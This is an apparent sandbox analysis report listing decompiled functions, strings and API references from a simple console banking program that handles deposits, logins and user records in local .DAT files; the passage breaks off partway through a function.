Given A/C number does not exits!, xrefs: 012B46B6
Cash+Deposited, xrefs: 012B498B
Are you sure you want to perform this tranasction? <Y/N>, xrefs: 012B47DD
Transaction completed successfully!, xrefs: 012B49C4
ACCOUNT.DAT, xrefs: 012B4681
TEMP.DAT, xrefs: 012B481C
%s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 012B486A
TRANSACTION.DAT, xrefs: 012B4950
%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 012B4915
Amount to be Deposited (in NRs.) : , xrefs: 012B46EE
[ %s ], xrefs: 012B46D8
%s to be deposited in A/C number : %s [ %s ], xrefs: 012B4755
Deposit to A/C number : , xrefs: 012B465E
%s %s %s %s %.2f %s, xrefs: 012B4994
ACCOUNT.DAT, xrefs: 012B4805
Confirm Transaction, xrefs: 012B471A

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vwscanf
String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be deposited in A/C number : %s [ %s ]$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Deposited (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Deposited$Confirm Transaction$Deposit to A/C number : $Given A/C number does not exits!$TEMP.DAT$TRANSACTION.DAT$Transaction completed successfully!$[ %s ]
API String ID: 532294799-930819241
Opcode ID: 8feceb237973636f726615a5dd17e93c5547c3f13532f4980d4f1b2a6c685bcd
Instruction ID: 4d9dc448db54fc257a90dc3d93eb099a66b02117937673131212f42972b6e71c
Opcode Fuzzy Hash: 8feceb237973636f726615a5dd17e93c5547c3f13532f4980d4f1b2a6c685bcd
Instruction Fuzzy Hash: 8D91B3B2D7020AABDB15FBA0DCC2EEE73789F69740F044659F50575180FA7066888BB6

Uniqueness

Uniqueness Score: -1.00%

Function 012B2B10, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 243
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E012B2B10(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v19;
				char _v23;
				char _v27;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v47;
				char _v48;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v75;
				char _v79;
				char _v80;
				char _v83;
				char _v87;
				char _v91;
				char _v95;
				char _v99;
				char _v103;
				char _v107;
				char _v111;
				char _v112;
				char _v144;
				char _v176;
				char _v208;
				void* __ebp;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t68;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t88;
				intOrPtr _t89;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t105;
				char _t106;
				void* _t109;
				void* _t110;
				intOrPtr _t119;
				intOrPtr _t130;
				intOrPtr _t132;
				void* _t136;
				void* _t140;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t149;
				void* _t150;
				void* _t154;

				_t161 = __fp0;
				_t135 = __esi;
				_t134 = __edi;
				_t113 = __ebx;
				_v48 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				_v23 = 0;
				_v19 = 0;
				_v112 = 0;
				_v111 = 0;
				_v107 = 0;
				_v103 = 0;
				_v99 = 0;
				_v95 = 0;
				_v91 = 0;
				_v87 = 0;
				_v83 = 0;
				_v80 = 0;
				_v79 = 0;
				_v75 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v16 = 0;
				_v12 = 0;
				E012B20E0(0, __edi, __esi, 0, __fp0);
				E012B12B0(0x19, 8);
				_push("User Name  : ");
				E012B715C(__ebx, __edi, __esi, 0);
				E012B738B("%s", 0x12d2ee4);
				E012B12B0(0x19, 0xa);
				_push("Password  : ");
				E012B715C(__ebx, __edi, __esi, 0);
				E012B12F0(_t134, _t135,  &_v112);
				_t66 = E012B6EF1("USER.DAT", "r");
				_t140 = _t136 + 0x18;
				 *0x12d2f28 = _t66;
				while(1) {
					_push( &_v144);
					_push( &_v176);
					_t67 =  *0x12d2f28; // 0x0
					_t68 = E012B7021(_t67, "%s %s %s\n", 0x12d2ee0);
					_t141 = _t140 + 0x14;
					if(_t68 == 0xffffffff) {
						break;
					}
					_t109 = E012B8230(0x12d2ee4,  &_v176);
					_t140 = _t141 + 8;
					if(_t109 == 0) {
						_t110 = E012B8230(0x12d2f02,  &_v144);
						_t140 = _t140 + 8;
						if(_t110 == 0) {
							_v16 = _v16 + 1;
						}
					}
				}
				_t116 =  *0x12d2f28; // 0x0
				_push(_t116);
				E012B6DB6(_t113, _t134, _t135, __eflags);
				_t142 = _t141 + 4;
				E012B20E0(_t116, _t134, _t135, __eflags, _t161);
				__eflags = _v16;
				if(__eflags != 0) {
					E012B12B0(8, 0xa);
					_push("Are you sure you want to CHANGE user name and/or password? <Y/N> : ");
					E012B715C(_t113, _t134, _t135, __eflags);
					_t143 = _t142 + 4;
					__eflags = _v5 - 0x59;
					if(__eflags == 0) {
						do {
							L10:
							E012B20E0(_t116, _t134, _t135, __eflags, _t161);
							_v12 = 0;
							E012B12B0(0x19, 8);
							_push("NEW User Name        : ");
							E012B715C(_t113, _t134, _t135, __eflags);
							E012B738B("%s",  &_v208);
							E012B12B0(0x19, 0xa);
							_push("NEW Password         : ");
							E012B715C(_t113, _t134, _t135, __eflags);
							E012B12F0(_t134, _t135,  &_v48);
							E012B12B0(0x19, 0xc);
							_push("Confirm NEW Password : ");
							E012B715C(_t113, _t134, _t135, __eflags);
							E012B12F0(_t134, _t135,  &_v80);
							_t116 =  &_v80;
							_t84 = E012B8230( &_v48,  &_v80);
							_t143 = _t143 + 0x1c;
							__eflags = _t84;
							if(__eflags != 0) {
								E012B20E0( &_v80, _t134, _t135, __eflags, _t161);
								E012B12B0(0xa, 0xa);
								_push(0x12cf710);
								E012B715C(_t113, _t134, _t135, __eflags);
								_t143 = _t143 + 4;
								_t105 = _v12 + 1;
								__eflags = _t105;
								_v12 = _t105;
							}
							__eflags = _v12;
						} while (__eflags != 0);
						 *0x12d2f28 = E012B6EF1("USER.DAT", 0x12cf740);
						_t86 = E012B6EF1("temp.dat", "a");
						_t149 = _t143 + 0x10;
						 *0x12d2f20 = _t86;
						while(1) {
							_push( &_v144);
							_push( &_v176);
							_t87 =  *0x12d2f28; // 0x0
							_t88 = E012B7021(_t87, "%s %s %s\n", 0x12d2ee0);
							_t150 = _t149 + 0x14;
							__eflags = _t88 - 0xffffffff;
							if(__eflags == 0) {
								break;
							}
							_t95 = E012B8230(0x12d2ee4,  &_v176);
							_t154 = _t150 + 8;
							__eflags = _t95;
							if(__eflags != 0) {
								L17:
								_push( &_v144);
								_push( &_v176);
								_push(0x12d2ee0);
								_push("%s %s %s\n");
								_t130 =  *0x12d2f20; // 0x0
								_push(_t130);
								E012B6F06(_t113, _t134, _t135, __eflags);
								_t149 = _t154 + 0x14;
								L19:
								continue;
							}
							_t98 = E012B8230(0x12d2f02,  &_v144);
							_t154 = _t154 + 8;
							__eflags = _t98;
							if(__eflags == 0) {
								_push( &_v48);
								_push( &_v208);
								_push(0x12d2ee0);
								_push("%s %s %s\n");
								_t132 =  *0x12d2f20; // 0x0
								_push(_t132);
								E012B6F06(_t113, _t134, _t135, __eflags);
								_t149 = _t154 + 0x14;
								goto L19;
							}
							goto L17;
						}
						_t89 =  *0x12d2f28; // 0x0
						_push(_t89);
						E012B6DB6(_t113, _t134, _t135, __eflags);
						_t119 =  *0x12d2f20; // 0x0
						_push(_t119);
						E012B6DB6(_t113, _t134, _t135, __eflags);
						E012B20E0(_t119, _t134, _t135, __eflags, _t161);
						E012B12B0(0x19, 0xa);
						_push("Record has been EDITED successfully!");
						return E012B715C(_t113, _t134, _t135, __eflags);
					}
					_t106 = _v5;
					__eflags = _t106 - 0x79;
					if(__eflags != 0) {
						return _t106;
					}
					goto L10;
				}
				E012B12B0(0xa, 0xa);
				_push(0x12cf640);
				return E012B715C(_t113, _t134, _t135, __eflags);
			}

0x012b2b10
0x012b2b10
0x012b2b10
0x012b2b10
0x012b2b19
0x012b2b1f
0x012b2b22
0x012b2b25
0x012b2b28
0x012b2b2b
0x012b2b2e
0x012b2b31
0x012b2b34
0x012b2b37
0x012b2b3d
0x012b2b40
0x012b2b43
0x012b2b46
0x012b2b49
0x012b2b4c
0x012b2b4f
0x012b2b52
0x012b2b55
0x012b2b5b
0x012b2b5e
0x012b2b61
0x012b2b64
0x012b2b67
0x012b2b6a
0x012b2b6d
0x012b2b70
0x012b2b73
0x012b2b7a
0x012b2b81
0x012b2b8a
0x012b2b8f
0x012b2b94
0x012b2ba6
0x012b2bb2
0x012b2bb7
0x012b2bbc
0x012b2bc8
0x012b2bd7
0x012b2bdc
0x012b2bdf
0x012b2be4
0x012b2bea
0x012b2bf1
0x012b2bfc
0x012b2c02
0x012b2c07
0x012b2c0d
0x00000000
0x00000000
0x012b2c1b
0x012b2c20
0x012b2c25
0x012b2c33
0x012b2c38
0x012b2c3d
0x012b2c45
0x012b2c45
0x012b2c3d
0x012b2c48
0x012b2c4a
0x012b2c50
0x012b2c51
0x012b2c56
0x012b2c59
0x012b2c5e
0x012b2c62
0x012b2c83
0x012b2c88
0x012b2c8d
0x012b2c92
0x012b2c99
0x012b2c9c
0x012b2cab
0x012b2cab
0x012b2cab
0x012b2cb0
0x012b2cbb
0x012b2cc0
0x012b2cc5
0x012b2cd9
0x012b2ce5
0x012b2cea
0x012b2cef
0x012b2cfb
0x012b2d04
0x012b2d09
0x012b2d0e
0x012b2d1a
0x012b2d1f
0x012b2d27
0x012b2d2c
0x012b2d2f
0x012b2d31
0x012b2d33
0x012b2d3c
0x012b2d41
0x012b2d46
0x012b2d4b
0x012b2d51
0x012b2d51
0x012b2d54
0x012b2d54
0x012b2d57
0x012b2d57
0x012b2d73
0x012b2d82
0x012b2d87
0x012b2d8a
0x012b2d8f
0x012b2d95
0x012b2d9c
0x012b2da7
0x012b2dad
0x012b2db2
0x012b2db5
0x012b2db8
0x00000000
0x00000000
0x012b2dca
0x012b2dcf
0x012b2dd2
0x012b2dd4
0x012b2dee
0x012b2df4
0x012b2dfb
0x012b2dfc
0x012b2e01
0x012b2e06
0x012b2e0c
0x012b2e0d
0x012b2e12
0x012b2e3b
0x00000000
0x012b2e3b
0x012b2de2
0x012b2de7
0x012b2dea
0x012b2dec
0x012b2e1a
0x012b2e21
0x012b2e22
0x012b2e27
0x012b2e2c
0x012b2e32
0x012b2e33
0x012b2e38
0x00000000
0x012b2e38
0x00000000
0x012b2dec
0x012b2e40
0x012b2e45
0x012b2e46
0x012b2e4e
0x012b2e54
0x012b2e55
0x012b2e5d
0x012b2e66
0x012b2e6b
0x00000000
0x012b2e75
0x012b2c9e
0x012b2ca2
0x012b2ca5
0x012b2e7b
0x012b2e7b
0x00000000
0x012b2ca5
0x012b2c68
0x012b2c6d
0x00000000

APIs

Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B20FF
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B213E
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B215F
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B216C
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B2188
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B2195
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B21C8

Part of subcall function 012B12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,012B1393,?,?,?,012B122E), ref: 012B12D1
Part of subcall function 012B12B0: SetConsoleCursorPosition.KERNEL32 ref: 012B12D8

_wprintf.LIBCMT ref: 012B2B94
_wscanf.LIBCMT ref: 012B2BA6

Part of subcall function 012B738B: _vwscanf.LIBCMT ref: 012B739C

_wprintf.LIBCMT ref: 012B2BBC

Part of subcall function 012B715C: __stbuf.LIBCMT ref: 012B71A8
Part of subcall function 012B715C: __output_s_l.LIBCMT ref: 012B71C2
Part of subcall function 012B715C: __ftbuf.LIBCMT ref: 012B71D6

Part of subcall function 012B12F0: _wprintf.LIBCMT ref: 012B1329

Part of subcall function 012B6EF1: __fsopen.LIBCMT ref: 012B6EFC

_swscanf.LIBCMT ref: 012B2C02

Part of subcall function 012B7021: _vfscanf.LIBCMT ref: 012B7035

_wprintf.LIBCMT ref: 012B2C72
_wprintf.LIBCMT ref: 012B2C8D
_wprintf.LIBCMT ref: 012B2CC5
_wscanf.LIBCMT ref: 012B2CD9
_wprintf.LIBCMT ref: 012B2CEF
_wprintf.LIBCMT ref: 012B2D0E
_wprintf.LIBCMT ref: 012B2D46
_swscanf.LIBCMT ref: 012B2DAD
_fprintf.LIBCMT ref: 012B2E0D
_fprintf.LIBCMT ref: 012B2E33
_wprintf.LIBCMT ref: 012B2E70

Strings

NEW Password : , xrefs: 012B2CEA
%s %s %s, xrefs: 012B2E27
%s %s %s, xrefs: 012B2DA2
temp.dat, xrefs: 012B2D7D
User Name : , xrefs: 012B2B8F
Confirm NEW Password : , xrefs: 012B2D09
Record has been EDITED successfully!, xrefs: 012B2E6B
%s %s %s, xrefs: 012B2BF7
Are you sure you want to CHANGE user name and/or password? <Y/N> : , xrefs: 012B2C88
USER.DAT, xrefs: 012B2BD2
NEW User Name : , xrefs: 012B2CC0
Password : , xrefs: 012B2BB7
%s %s %s, xrefs: 012B2E01
USER.DAT, xrefs: 012B2D66

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _wprintf$__wstrtime_fprintf_swscanf_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vfscanf_vwscanf
String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s$Are you sure you want to CHANGE user name and/or password? <Y/N> : $Confirm NEW Password : $NEW Password : $NEW User Name : $Password : $Record has been EDITED successfully!$USER.DAT$USER.DAT$User Name : $temp.dat
API String ID: 1431756120-371646773
Opcode ID: 51d85caa64092905a8052e4c1fb7ac626fcde7ef8f7fdff9aab1796bed77a148
Instruction ID: f56b5f0cccc7a329e9b9c8095a08607b70dfdff6ce29e4bf9602f87a4d424d1d
Opcode Fuzzy Hash: 51d85caa64092905a8052e4c1fb7ac626fcde7ef8f7fdff9aab1796bed77a148
Instruction Fuzzy Hash: AF81A3B1D70306EEEB14EBE5DCC2FED76756F25780F04856DE608B6280E67061188B76

Uniqueness

Uniqueness Score: -1.00%

Function 012B2800, Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 223
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E012B2800(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __fp0) {
				char _v5;
				intOrPtr _v12;
				char _v20;
				char _v23;
				char _v27;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v47;
				char _v51;
				char _v52;
				char _v84;
				char _v116;
				char _v129;
				char _v139;
				char _v154;
				char _v188;
				void* __ebp;
				intOrPtr _t47;
				void* _t49;
				char _t54;
				intOrPtr _t56;
				void* _t58;
				intOrPtr _t62;
				void* _t65;
				intOrPtr _t67;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t83;
				void* _t86;
				void* _t88;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t96;
				intOrPtr _t99;
				intOrPtr _t105;
				intOrPtr _t107;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t127;
				void* _t128;
				void* _t132;
				void* _t133;
				void* _t139;

				_t146 = __fp0;
				_t117 = __esi;
				_t116 = __edi;
				_t89 = __ebx;
				_v52 = 0;
				_v51 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				_v23 = 0;
				_v12 = 0;
				E012B20E0(__ecx, __edi, __esi, 0, __fp0);
				E012B12B0(0x19, 8);
				_push("User Name  : ");
				E012B715C(__ebx, __edi, __esi, 0);
				E012B738B("%s", 0x12d2ee4);
				E012B12B0(0x19, 0xa);
				_push("Password  : ");
				E012B715C(__ebx, __edi, __esi, 0);
				E012B12F0(_t116, _t117,  &_v52);
				_t47 = E012B6EF1("USER.DAT", "r");
				_t122 = _t118 + 0x18;
				 *0x12d2f28 = _t47;
				while(1) {
					_push( &_v116);
					_push( &_v84);
					_t92 =  *0x12d2f28; // 0x0
					_t49 = E012B7021(_t92, "%s %s %s\n", 0x12d2ee0);
					_t123 = _t122 + 0x14;
					if(_t49 == 0xffffffff) {
						break;
					}
					_t86 = E012B8230(0x12d2ee4,  &_v84);
					_t122 = _t123 + 8;
					if(_t86 == 0) {
						_t88 = E012B8230(0x12d2f02,  &_v116);
						_t122 = _t122 + 8;
						if(_t88 == 0) {
							_v12 = _v12 + 1;
						}
					}
				}
				_t105 =  *0x12d2f28; // 0x0
				_push(_t105);
				E012B6DB6(_t89, _t116, _t117, __eflags);
				_t124 = _t123 + 4;
				E012B20E0(_t92, _t116, _t117, __eflags, _t146);
				__eflags = _v12;
				if(__eflags != 0) {
					E012B12B0(0xf, 0xa);
					_push("Are you sure you want to DELETE this user? <Y/N> : ");
					E012B715C(_t89, _t116, _t117, __eflags);
					_t125 = _t124 + 4;
					_t54 = _v5;
					__eflags = _t54 - 0x59;
					if(_t54 == 0x59) {
						L10:
						 *0x12d2f28 = E012B6EF1("USER.DAT", "r");
						_t56 = E012B6EF1("temp.dat", "a");
						_t127 = _t125 + 0x10;
						 *0x12d2f20 = _t56;
						while(1) {
							_push( &_v116);
							_push( &_v84);
							_t93 =  *0x12d2f28; // 0x0
							_t58 = E012B7021(_t93, "%s %s %s\n", 0x12d2ee0);
							_t128 = _t127 + 0x14;
							__eflags = _t58 - 0xffffffff;
							if(__eflags == 0) {
								break;
							}
							_t79 = E012B8230(0x12d2ee4,  &_v84);
							_t139 = _t128 + 8;
							__eflags = _t79;
							if(__eflags != 0) {
								L14:
								_push( &_v116);
								_push( &_v84);
								_push(0x12d2ee0);
								_push("%s %s %s\n");
								_t80 =  *0x12d2f20; // 0x0
								_push(_t80);
								E012B6F06(_t89, _t116, _t117, __eflags);
								_t127 = _t139 + 0x14;
								L15:
								continue;
							}
							_t83 = E012B8230(0x12d2f02,  &_v116);
							_t127 = _t139 + 8;
							__eflags = _t83;
							if(__eflags == 0) {
								goto L15;
							}
							goto L14;
						}
						_t94 =  *0x12d2f28; // 0x0
						_push(_t94);
						E012B6DB6(_t89, _t116, _t117, __eflags);
						_t107 =  *0x12d2f20; // 0x0
						_push(_t107);
						E012B6DB6(_t89, _t116, _t117, __eflags);
						 *0x12d2f28 = E012B6EF1("LOG.DAT", "r");
						_t62 = E012B6EF1("temp.dat", "w");
						_t132 = _t128 + 0x18;
						 *0x12d2f20 = _t62;
						while(1) {
							_push( &_v129);
							_push( &_v139);
							_push( &_v154);
							_t96 =  *0x12d2f28; // 0x0
							_t65 = E012B7021(_t96, "%s %s %s %s",  &_v188);
							_t133 = _t132 + 0x18;
							__eflags = _t65 - 0xffffffff;
							if(__eflags == 0) {
								break;
							}
							E012C7CF2( &_v188);
							E012C7CF2( &_v20);
							_t75 = E012B8230( &_v188,  &_v20);
							_t132 = _t133 + 0x10;
							__eflags = _t75;
							if(__eflags != 0) {
								_push( &_v129);
								_push( &_v139);
								_push( &_v154);
								_push( &_v188);
								_push("%s %s %s %s\n");
								_t99 =  *0x12d2f20; // 0x0
								_push(_t99);
								E012B6F06(_t89, _t116, _t117, __eflags);
								_t132 = _t132 + 0x18;
							}
						}
						_t109 =  *0x12d2f28; // 0x0
						_push(_t109);
						E012B6DB6(_t89, _t116, _t117, __eflags);
						_t67 =  *0x12d2f20; // 0x0
						_push(_t67);
						E012B6DB6(_t89, _t116, _t117, __eflags);
						E012B20E0(_t96, _t116, _t117, __eflags, _t146);
						E012B12B0(0x19, 0xa);
						_push("Record DELETED successfully!");
						return E012B715C(_t89, _t116, _t117, __eflags);
					}
					__eflags = _v5 - 0x79;
					if(_v5 != 0x79) {
						return _t54;
					}
					goto L10;
				}
				E012B12B0(0xa, 0xa);
				_push(0x12cf4fc);
				return E012B715C(_t89, _t116, _t117, __eflags);
			}

0x012b2800
0x012b2800
0x012b2800
0x012b2800
0x012b2809
0x012b280f
0x012b2812
0x012b2815
0x012b2818
0x012b281b
0x012b281e
0x012b2821
0x012b2824
0x012b2827
0x012b282e
0x012b2837
0x012b283c
0x012b2841
0x012b2853
0x012b285f
0x012b2864
0x012b2869
0x012b2875
0x012b2884
0x012b2889
0x012b288c
0x012b2891
0x012b2894
0x012b2898
0x012b28a3
0x012b28aa
0x012b28af
0x012b28b5
0x00000000
0x00000000
0x012b28c0
0x012b28c5
0x012b28ca
0x012b28d5
0x012b28da
0x012b28df
0x012b28e7
0x012b28e7
0x012b28df
0x012b28ea
0x012b28ec
0x012b28f2
0x012b28f3
0x012b28f8
0x012b28fb
0x012b2900
0x012b2904
0x012b2925
0x012b292a
0x012b292f
0x012b2934
0x012b2937
0x012b293b
0x012b293e
0x012b294d
0x012b295f
0x012b296e
0x012b2973
0x012b2976
0x012b297b
0x012b297e
0x012b2982
0x012b298d
0x012b2994
0x012b2999
0x012b299c
0x012b299f
0x00000000
0x00000000
0x012b29aa
0x012b29af
0x012b29b2
0x012b29b4
0x012b29cb
0x012b29ce
0x012b29d2
0x012b29d3
0x012b29d8
0x012b29dd
0x012b29e2
0x012b29e3
0x012b29e8
0x012b29eb
0x00000000
0x012b29eb
0x012b29bf
0x012b29c4
0x012b29c7
0x012b29c9
0x00000000
0x00000000
0x00000000
0x012b29c9
0x012b29ed
0x012b29f3
0x012b29f4
0x012b29fc
0x012b2a02
0x012b2a03
0x012b2a1d
0x012b2a2c
0x012b2a31
0x012b2a34
0x012b2a39
0x012b2a3c
0x012b2a43
0x012b2a4a
0x012b2a57
0x012b2a5e
0x012b2a63
0x012b2a66
0x012b2a69
0x00000000
0x00000000
0x012b2a72
0x012b2a7e
0x012b2a91
0x012b2a96
0x012b2a99
0x012b2a9b
0x012b2aa0
0x012b2aa7
0x012b2aae
0x012b2ab5
0x012b2ab6
0x012b2abb
0x012b2ac1
0x012b2ac2
0x012b2ac7
0x012b2ac7
0x012b2aca
0x012b2acf
0x012b2ad5
0x012b2ad6
0x012b2ade
0x012b2ae3
0x012b2ae4
0x012b2aec
0x012b2af5
0x012b2afa
0x00000000
0x012b2b04
0x012b2944
0x012b2947
0x012b2b0a
0x012b2b0a
0x00000000
0x012b2947
0x012b290a
0x012b290f
0x00000000

APIs

Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B20FF
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B213E
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B215F
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B216C
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B2188
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B2195
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B21C8

Part of subcall function 012B12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,012B1393,?,?,?,012B122E), ref: 012B12D1
Part of subcall function 012B12B0: SetConsoleCursorPosition.KERNEL32 ref: 012B12D8

_wprintf.LIBCMT ref: 012B2841
_wscanf.LIBCMT ref: 012B2853

Part of subcall function 012B738B: _vwscanf.LIBCMT ref: 012B739C

_wprintf.LIBCMT ref: 012B2869

Part of subcall function 012B715C: __stbuf.LIBCMT ref: 012B71A8
Part of subcall function 012B715C: __output_s_l.LIBCMT ref: 012B71C2
Part of subcall function 012B715C: __ftbuf.LIBCMT ref: 012B71D6

Part of subcall function 012B12F0: _wprintf.LIBCMT ref: 012B1329

Part of subcall function 012B6EF1: __fsopen.LIBCMT ref: 012B6EFC

_swscanf.LIBCMT ref: 012B28AA

Part of subcall function 012B7021: _vfscanf.LIBCMT ref: 012B7035

_wprintf.LIBCMT ref: 012B2914
_wprintf.LIBCMT ref: 012B292F
_swscanf.LIBCMT ref: 012B2994
_fprintf.LIBCMT ref: 012B29E3
_swscanf.LIBCMT ref: 012B2A5E
_fprintf.LIBCMT ref: 012B2AC2
_wprintf.LIBCMT ref: 012B2AFF

Strings

temp.dat, xrefs: 012B2969
Password : , xrefs: 012B2864
User Name : , xrefs: 012B283C
USER.DAT, xrefs: 012B2952
%s %s %s, xrefs: 012B2988
Record DELETED successfully!, xrefs: 012B2AFA
Are you sure you want to DELETE this user? <Y/N> : , xrefs: 012B292A
%s %s %s, xrefs: 012B289E
temp.dat, xrefs: 012B2A27
%s %s %s, xrefs: 012B29D8
LOG.DAT, xrefs: 012B2A10
%s %s %s %s, xrefs: 012B2AB6
USER.DAT, xrefs: 012B287F
%s %s %s %s, xrefs: 012B2A52

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _wprintf$_swscanf$__wstrtime_fprintf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vfscanf_vwscanf_wscanf
String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s %s$%s %s %s %s$Are you sure you want to DELETE this user? <Y/N> : $LOG.DAT$Password : $Record DELETED successfully!$USER.DAT$USER.DAT$User Name : $temp.dat$temp.dat
API String ID: 3163849712-4002591224
Opcode ID: f7aa6cd5f52c1f75f97933c2ecfa272c74e799592ad8726981822e4885d42955
Instruction ID: 2a7c25b3c157bfe5c5677f377f4f9e22ea153e67f13fca6477a5832a657d8706
Opcode Fuzzy Hash: f7aa6cd5f52c1f75f97933c2ecfa272c74e799592ad8726981822e4885d42955
Instruction Fuzzy Hash: F77197B2D70306AFD715EBE4ECC2EFE7265AB35B80F04466DE605A1144F671A2448772

Uniqueness

Uniqueness Score: -1.00%

Function 012B25C0, Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E012B25C0(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v15;
				char _v19;
				char _v23;
				char _v27;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v44;
				char _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v75;
				char _v76;
				char _v108;
				char _v140;
				void* __ebp;
				intOrPtr _t42;
				void* _t44;
				intOrPtr _t53;
				intOrPtr _t58;
				intOrPtr _t67;
				void* _t70;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t76;
				intOrPtr _t79;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t103;

				_t103 = __fp0;
				_t84 = __esi;
				_t83 = __edi;
				_t73 = __ebx;
				_v8 = 0;
				_v12 = 0;
				_v76 = 0;
				_v75 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v44 = 0;
				_t74 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				_v23 = 0;
				_v19 = 0;
				_v15 = 0;
				do {
					E012B20E0(_t74, _t83, _t84, 0, _t103);
					_v8 = 0;
					E012B12B0(0x19, 8);
					_push("User Name        : ");
					E012B715C(_t73, _t83, _t84, 0);
					E012B738B("%s", 0x12d2ee4);
					_t42 = E012B6EF1("USER.DAT", "r");
					_t88 = _t85 + 0x14;
					 *0x12d2f28 = _t42;
					_v12 = 0;
					while(1) {
						_push( &_v140);
						_push( &_v108);
						_t75 =  *0x12d2f28; // 0x0
						_t44 = E012B7021(_t75, "%s %s %s\n", 0x12d2ee0);
						_t89 = _t88 + 0x14;
						if(_t44 == 0xffffffff) {
							goto L6;
						}
						_t70 = E012B8230( &_v108, 0x12d2ee4);
						_t88 = _t89 + 8;
						if(_t70 == 0) {
							_v12 = _v12 + 1;
						}
					}
					L6:
					_t74 =  *0x12d2f28; // 0x0
					_push(_t74);
